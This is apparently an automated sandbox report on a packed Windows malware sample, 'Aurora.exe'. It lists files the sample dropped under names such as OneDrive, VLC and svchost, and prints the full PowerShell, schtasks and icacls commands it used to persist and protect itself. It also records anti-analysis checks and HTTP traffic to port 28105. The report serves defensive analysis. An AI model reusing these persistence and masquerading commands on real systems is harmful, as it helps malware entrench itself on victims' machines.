                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: napinsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: pnrpnsp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wshbth.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: nlaapi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: winrnr.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: wbemcomn.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: amsi.dll
                      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\Aurora.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\Aurora.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dllJump to behavior
                      Source: Aurora.exeStatic file information: File size 22316547 > 1048576
                      Source: C:\Users\user\Desktop\Aurora.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
                      Source: Aurora.exeStatic PE information: Raw size of is bigger than: 0x100000 < 0x1209e00
                      Source: Aurora.exeStatic PE information: Raw size of .boot is bigger than: 0x100000 < 0x33d600
                      Source: Binary string: C:\Windows\System.ServiceModel.pdbpdbdel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B27000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.pdbx source: build.exe, 00000004.00000002.2918227460.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdbB) source: Aurora.exe, 00000000.00000002.1987273449.0000000002089000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B82000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\System.ServiceModel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B82000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\System.ServiceModel.pdb~- source: build.exe, 00000004.00000002.2918227460.0000000000B82000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\mscorlib.pdbu source: Aurora.exe, 00000000.00000002.1994816261.00000000042E6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdb source: Aurora.exe, 00000000.00000002.1987273449.0000000002089000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: nHC:\Windows\System.ServiceModel.pdb source: build.exe, 00000004.00000002.2916704878.0000000000987000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: Z:\Development\SecureEngine\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: Aurora.exe, 00000000.00000002.1956220610.00000000012B4000.00000040.00000001.01000000.00000003.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdbL source: build.exe, 00000004.00000002.2918227460.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: lib.pdb source: Aurora.exe, 00000000.00000002.1994816261.00000000042E6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\dll\mscorlib.pdbP> source: Aurora.exe, 00000000.00000002.1987273449.0000000002089000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\mscorlib.pdb source: Aurora.exe, 00000000.00000002.1987273449.0000000002061000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: .pdb. source: Aurora.exe, 00000000.00000002.1986631416.0000000001EF9000.00000004.00000010.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Users\user\Desktop\Aurora.PDB0 source: Aurora.exe, 00000000.00000002.1987273449.0000000002089000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ServiceModel.pdb693405117-2476756634-1002_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\Servererver32 source: build.exe, 00000004.00000002.2918227460.0000000000B82000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: C:\Windows\dll\mscorlib.pdb source: Aurora.exe, 00000000.00000002.1994816261.00000000042E6000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: System.ServiceModel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B98000.00000004.00000020.00020000.00000000.sdmp, build.exe, 00000004.00000002.2918227460.0000000000B27000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: \??\C:\Windows\symbols\dll\System.ServiceModel.pdb source: build.exe, 00000004.00000002.2918227460.0000000000B5F000.00000004.00000020.00020000.00000000.sdmp
                      Source: Binary string: n.pdbService source: build.exe, 00000004.00000002.2916704878.0000000000987000.00000004.00000010.00020000.00000000.sdmp

                      Data Obfuscation

                      barindex
                      Source: C:\Users\user\Desktop\Aurora.exeUnpacked PE file: 0.2.Aurora.exe.a0000.0.unpack :ER; :R; :R;.idata:W;.rsrc:R;.themida:EW;.boot:ER; vs :ER; :R; :R;
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: unknownProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lygkxs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Remove -ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate';New-ItemProperty -Path 'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run' -Name 'OneDriveUpdate' -Value '"C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe"' -PropertyType 'String'Jump to behavior
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#npnsokoe#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#lygkxs#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /tn 'ConsoleWindowsHost' /tr '''C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exe') -Trigger (New-ScheduledTaskTrigger -AtLogOn) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'ConsoleWindowsHost' -RunLevel 'Highest' -Force; }
                      Source: build.exe.0.drStatic PE information: 0xF00CA9A2 [Wed Aug 14 23:34:58 2097 UTC]
                      Source: initial sampleStatic PE information: section where entry point is pointing to: .boot
                      Source: OneDrive.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x3320c0
                      Source: vlc.exe.0.drStatic PE information: real checksum: 0x596cd6 should be: 0x593b78
                      Source: OneDrive Updater.exe.7.drStatic PE information: real checksum: 0x0 should be: 0x3320c0
                      Source: svchost.exe.19.drStatic PE information: real checksum: 0x596cd6 should be: 0x593b78
                      Source: build.exe.0.drStatic PE information: real checksum: 0x0 should be: 0x196cf
                      Source: Null.0.drStatic PE information: real checksum: 0x1935a40 should be: 0x107475
                      Source: Aurora.exeStatic PE information: section name:
                      Source: Aurora.exeStatic PE information: section name:
                      Source: Aurora.exeStatic PE information: section name:
                      Source: Aurora.exeStatic PE information: section name: .themida
                      Source: Aurora.exeStatic PE information: section name: .boot
                      Source: vlc.exe.0.drStatic PE information: section name: .xdata
                      Source: Null.0.drStatic PE information: section name: .xdata
                      Source: Null.0.drStatic PE information: section name: /4
                      Source: Null.0.drStatic PE information: section name: /19
                      Source: Null.0.drStatic PE information: section name: /31
                      Source: Null.0.drStatic PE information: section name: /45
                      Source: Null.0.drStatic PE information: section name: /57
                      Source: Null.0.drStatic PE information: section name: /70
                      Source: Null.0.drStatic PE information: section name: /81
                      Source: Null.0.drStatic PE information: section name: /92
                      Source: Null.0.drStatic PE information: section name: /106
                      Source: Null.0.drStatic PE information: section name: /125
                      Source: Null.0.drStatic PE information: section name: /141
                      Source: Null.0.drStatic PE information: section name: /157
                      Source: svchost.exe.19.drStatic PE information: section name: .xdata
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9B9BD2A5 pushad ; iretd 22_2_00007FFD9B9BD2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9BAD7B9A push eax; ret 22_2_00007FFD9BAD7BA9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9BAD7BD3 push eax; ret 22_2_00007FFD9BAD7BA9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9BAD36DC push esi; retf 22_2_00007FFD9BAD373A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9BAD35D0 push esi; retf 22_2_00007FFD9BAD362A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 22_2_00007FFD9BAD754D push ebx; iretd 22_2_00007FFD9BAD756A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 32_2_0549CB20 push 18418B05h; ret 32_2_0549CD83
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 58_2_00007FFD9B98D2A5 pushad ; iretd 58_2_00007FFD9B98D2A6
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 58_2_00007FFD9BAA3AD3 pushad ; ret 58_2_00007FFD9BAA3AD9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 58_2_00007FFD9BAA758D push ebx; iretd 58_2_00007FFD9BAA756A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 58_2_00007FFD9BAA752B push ebx; iretd 58_2_00007FFD9BAA756A
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 58_2_00007FFD9BB71B79 push 7000001Bh; ret 58_2_00007FFD9BB71BB9
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 58_2_00007FFD9BB728B4 push 70000028h; ret 58_2_00007FFD9BB728B9

                      Persistence and Installation Behavior

                      barindex
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeFile created: C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Aurora.exeFile created: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeFile created: C:\Users\user\AppData\Roaming\Google\Chrome\svchost.exeJump to dropped file
                      Source: C:\Users\user\AppData\Roaming\OneDrive Update Tool\OneDrive.exeFile created: C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Aurora.exeFile created: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeJump to dropped file
                      Source: C:\Windows\System32\cmd.exeFile created: C:\Users\user\AppData\Local\Msedge.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Aurora.exeFile created: C:\Users\user\AppData\Roaming\VLC Media Player\vlc.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Aurora.exeFile created: C:\Users\user\AppData\Roaming\Microsoft Edge\build.exeJump to dropped file
                      Source: C:\Users\user\Desktop\Aurora.exeFile created: \Device\NullJump to dropped file
                      Source: C:\Users\user\Desktop\Aurora.exeFile created: \Device\NullJump to dropped file

                      Boot Survival

                      barindex
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft EdgeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveUpdateJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeWindow searched: window name: RegmonClassJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeWindow searched: window name: FilemonClassJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn \OneDriveUpdate /tr "C:\Users\user\AppData\Roaming\OneDriveUpdate\OneDrive Updater.exe" /st 00:00 /du 9999:59 /sc once /ri 60 /rl HIGHEST /f
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft EdgeJump to behavior
                      Source: C:\Users\user\AppData\Roaming\AdobeLicense\AdobeUpdate.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run Microsoft EdgeJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveUpdateJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OneDriveUpdateJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe:Zone.Identifier read attributes | delete
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49762 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 28105
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 28105
                      Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\icacls.exe icacls "C:\Users\user\AppData\Local\Msedge.exe" /deny "everyone":(WD,AD,WEA,WA)
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\Aurora.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
